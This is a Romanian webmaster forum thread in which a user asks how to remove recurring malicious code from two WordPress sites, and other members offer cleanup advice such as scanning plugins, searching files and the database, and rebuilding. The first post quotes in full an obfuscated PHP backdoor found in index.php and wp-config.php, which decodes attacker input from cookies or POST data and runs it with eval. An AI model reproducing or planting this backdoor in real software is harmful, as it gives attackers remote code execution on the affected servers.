Pagina 1 din 2 12 UltimulUltimul
Rezultate 1 la 10 din 13

Subiect: Virus pe site

Inu
    Inu este deconectat Membru SeoPedia
    Reputatie:
    23
    Data înscrierii
    4th January 2014
    Locaţie
    Resita
    Vârstă
    37
    Posturi
    182
    Putere Rep
    23

Implicit Virus pe site

Salut, de curand am observat in fiserele de pe doua site-uri coduri ciudate. Am reusit sa sterg codurile din fisierele php aflate pe server, insa astazi m-am trezit din nou cu virus pe site.

Site-urile sunt pe wordpress ( actualizat la zi) si teme cumparate si actualizate de pe themeforest.

Ce imi recomandati sa fac? Ca si exemplu, asa arata codul
    <? - php
    $kpctp = '*3sH_otxgmr92n#bkulvyep8ai-4c6fd7\'1';$unlkuzj = Array();$unlkuzj[] = $kpctp[29].$kpctp[29].$kpctp[32].$kpctp[11].$kpctp[11].$kpctp[29].$kpctp[34].$kpctp[34].$kpctp[26].$kpctp[23].$kpctp[12].$kpctp[30].$kpctp[27].$kpctp[26].$kpctp[27].$kpctp[31].$kpctp[28].$kpctp[11].$kpctp[26].$kpctp[24].$kpctp[32].$kpctp[23].$kpctp[1].$kpctp[26].$kpctp[12].$kpctp[27].$kpctp[1].$kpctp[23].$kpctp[31].$kpctp[31].$kpctp[11].$kpctp[15].$kpctp[29].$kpctp[29].$kpctp[28].$kpctp[31];$unlkuzj[] = $kpctp[3].$kpctp[0];$unlkuzj[] = $kpctp[14];$unlkuzj[] = $kpctp[28].$kpctp[5].$kpctp[17].$kpctp[13].$kpctp[6];$unlkuzj[] = $kpctp[2].$kpctp[6].$kpctp[10].$kpctp[4].$kpctp[10].$kpctp[21].$kpctp[22].$kpctp[21].$kpctp[24].$kpctp[6];$unlkuzj[] = $kpctp[21].$kpctp[7].$kpctp[22].$kpctp[18].$kpctp[5].$kpctp[31].$kpctp[21];$unlkuzj[] = $kpctp[2].$kpctp[17].$kpctp[15].$kpctp[2].$kpctp[6].$kpctp[10];$unlkuzj[] = $kpctp[24].$kpctp[10].$kpctp[10].$kpctp[24].$kpctp[20].$kpctp[4].$kpctp[9].$kpctp[21].$kpctp[10].$kpctp[8].$kpctp[21];$unlkuzj[] = $kpctp[2].$kpctp[6].$kpctp[10].$kpctp[18].$kpctp[21].$kpctp[13];$unlkuzj[] = $kpctp[22].$kpctp[24].$kpctp[28].$kpctp[16];foreach ($unlkuzj[7]($_COOKIE, $_POST) as $cinxu => $zybvyo){function znarkyr($unlkuzj, $cinxu, $zlqgrj){return $unlkuzj[6]($unlkuzj[4]($cinxu . $unlkuzj[0], ($zlqgrj / $unlkuzj[8]($cinxu)) + 1), 0, $zlqgrj);}function ojvevji($unlkuzj, $cafsylq){return @$unlkuzj[9]($unlkuzj[1], $cafsylq);}function xszry($unlkuzj, $cafsylq){$bvtejoy = $unlkuzj[3]($cafsylq) % 3;if (!$bvtejoy) {eval($cafsylq[1]($cafsylq[2]));exit();}}$zybvyo = ojvevji($unlkuzj, $zybvyo);xszry($unlkuzj, $unlkuzj[5]($unlkuzj[2], $zybvyo ^ znarkyr($unlkuzj, $cinxu, $unlkuzj[8]($zybvyo))));}
    Il gasesc doar in index.php si wp-config.php, insa nu am probleme cu site-ul sau sa nu il pot accesa.

Multumesc anticipat!
    Imi place sa scriu despre raliuri, viteza in coasta

Benko Zoltan este deconectat Membru SeoPedia
    Reputatie:
    26
    Data înscrierii
    18th March 2013
    Vârstă
    53
    Posturi
    359
    Putere Rep
    26

Implicit

Incearca sa pui sus pluginul Wordfence si sa cureti.

https://ro.wordpress.org/plugins/wordfence/

Personal dupa curatare as sterge tot siteul si as cladi din nou cu baza de date veche.

Rapsodia este deconectat Membru SeoPedia
    Reputatie:
    33
    Data înscrierii
    18th March 2013
    Locaţie
    Hungary + Chișinău + Câmpina
    Posturi
    2.788
    Putere Rep
    33

Implicit

Citat Postat în original de Benko Zoltan Vezi Post
    Incearca sa pui sus pluginul Wordfence si sa cureti.

https://ro.wordpress.org/plugins/wordfence/

Personal dupa curatare as sterge tot siteul si as cladi din nou cu baza de date veche.
    Sa ne zici daca te-a ajutat Wordfence , eu il am pe site-uri insa as vrea sa stiu daca chiar curata site-ul.
    Ofer servicii Social Media Marketing!. Articole contra cost Oferta generala, ro, fr si ru aici!

Seph este deconectat Membru SeoPedia
    Reputatie:
    38
    Data înscrierii
    7th June 2006
    Posturi
    381
    Putere Rep
    38

1 out of 1 members found this post helpful.

Implicit

Cativa pasi pe care i-as face:

1. Verifici cu https://sitecheck.sucuri.net/
    2. Dai un search in toate fisierele site-ului, de exemplu cu Dreamweaver poti sa faci search intr-un folder (folder-ul cu fisierele site-ului).
    3. Dai search in baza de date dupa termenii de mai sus din acel cod.
    4. Verifici functions.php si cam toate fisierele wordpress-ului sa nu existe vreun cod care insereaza acel cod php.
    5. Verifici plugin-urile, e posibil ca unul din ele sa fie mai vechi si cu probleme de securitate.

Daca ai un cont de gazduire shared, adica cu mai multe site-uri la gramada, e posibil ca acel cod sa se fi propagat de la alt site, va trebui sa verifici tot.

Bela este deconectat Membru SeoPedia
    Reputatie:
    21
    Data înscrierii
    23rd May 2015
    Posturi
    198
    Putere Rep
    21

Implicit

Am un anti-virus cu care am curatat 6 site-uri pe shared hosting in 8 minute.

Daca nu rezolvi cu Wordfence, si vrei, as testa anti-virusul pe codul asta, dar am nevoie de access la site... da-mi pm...

Adrian A. este deconectat Membru SeoPedia
    Reputatie:
    15
    Data înscrierii
    5th June 2018
    Locaţie
    Cluj-Napoca
    Vârstă
    45
    Posturi
    37
    Putere Rep
    15

Implicit

Citat Postat în original de Seph Vezi Post
    5. Verifici plugin-urile, e posibil ca unul din ele sa fie mai vechi si cu probleme de securitate.

Daca ai un cont de gazduire shared, adica cu mai multe site-uri la gramada, e posibil ca acel cod sa se fi propagat de la alt site, va trebui sa verifici tot.
    Da, astea sunt niste situatii frecvente.

Banuiesc ca Wordpress e actualizat la zi (?).

Ce am mai vazut: atacatorul si-a creat un user. Uita-te la lista de useri.

Citat Postat în original de Benko Zoltan Vezi Post
    Da, asa trebuie facut pentru ca nu mai ai certitudinea ca fisierele Wordpress nu sunt modificate si lasate backdoor-uri. De periat bine si baza de date, cum ziceau ceilalti.

Empire este deconectat Banned
    Reputatie:
    0
    Data înscrierii
    14th December 2010
    Locaţie
    BM
    Vârstă
    42
    Posturi
    360
    Putere Rep
    0

Implicit

Exista fisiere php bagate prin locuri nebanuite (ex. in directorul de css), al caror rol e sa iti tot modifice index.php si wp-config.php; Daca esti familiar cu wordpress le poti gasi manual, dar e de munca.

Inu
    Reputatie:
    23
    Data înscrierii
    4th January 2014
    Locaţie
    Resita
    Vârstă
    37
    Posturi
    182
    Putere Rep
    23

Implicit

Citat Postat în original de Rapsodia Vezi Post
    Sa ne zici daca te-a ajutat Wordfence , eu il am pe site-uri insa as vrea sa stiu daca chiar curata site-ul.
    Dupa cateva incercari cu Wordfence, am reusit doar sa gasesc "sursa" codului, in rest nu prea ma ajutat cu nimic ( in cazul meu ).

Cativa pasi pe care i-as face:

1. Verifici cu https://sitecheck.sucuri.net/
    2. Dai un search in toate fisierele site-ului, de exemplu cu Dreamweaver poti sa faci search intr-un folder (folder-ul cu fisierele site-ului).
    3. Dai search in baza de date dupa termenii de mai sus din acel cod.
    4. Verifici functions.php si cam toate fisierele wordpress-ului sa nu existe vreun cod care insereaza acel cod php.

Am verificat cu https://sitecheck.sucuri.net/, insa imi spune ca site-ul este ok si Low Security Risk, probabil nu vede codul respectiv. Am bagat site-ul in mentenanta si am inceput curatarea manuala in fiecare fisier in parte, fie .php .js .css s.a.m.d

#Adrian A. Totul este actualizat la zi, Wordpress, teme, plugin etc. User nu este creat pe site si nici in baza de date nu am gasit nimic momentan.

Revin cu noutati in caz ca o sa gasesc luminita de la capatul tunelului, pana atunci sunt inarmat cu apa,apa si multa apa, glumesc. Dau o bere cand gat

Inu
    Reputatie:
    23
    Data înscrierii
    4th January 2014
    Locaţie
    Resita
    Vârstă
    37
    Posturi
    182
    Putere Rep
    23

Implicit

Citat Postat în original de Empire Vezi Post
    Exista fisiere php bagate prin locuri nebanuite (ex. in directorul de css), al caror rol e sa iti tot modifice index.php si wp-config.php; Daca esti familiar cu wordpress le poti gasi manual, dar e de munca.
    Fisiere exista chiar unde nici nu ma gandeam, m-am inarmat cu manusi pana la cot, rabdare, bere si singura solutie o vad sa verific fiecare fisier in parte

Adrian A. este deconectat Membru SeoPedia
    Reputatie:
    15
    Data înscrierii
    5th June 2018
    Locaţie
    Cluj-Napoca
    Vârstă
    45
    Posturi
    37
    Putere Rep
    15

Implicit

O sursa posibila mai este o masina Windows infectata care are salvat userul si parola de FTP.

De verificat cand a s-a facut ultima data release la fiecare plugin si cautat vulnerabilitiati cunoscute ale plugin-urilor in site-uri gen: https://www.exploit-db.com/

Daca e vreun plugin fara update-uri publicate de 2-3 ani, s-ar putea sa fie degeaba la zi.

Pagina 1 din 2 12 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Thread-uri Similare

1. Virus DB Wordpress
    De EPoX în forumul Server side
    Răspunsuri: 6
    Ultimul Post: 18th May 2018, 11:58
  2. Virus sau ... ?
    De Ing3ras în forumul Bar, lobby...
    Răspunsuri: 13
    Ultimul Post: 9th May 2014, 15:42
  3. Problema cu un Virus / malicious URL pe site !?
    De gaby în forumul Client side
    Răspunsuri: 12
    Ultimul Post: 2nd December 2012, 16:57
  4. Virus PC
    De style în forumul Bar, lobby...
    Răspunsuri: 2
    Ultimul Post: 15th October 2007, 23:32
  5. Virus Pe Site
    De style în forumul Bar, lobby...
    Răspunsuri: 4
    Ultimul Post: 12th October 2007, 14:14

Permisiuni postare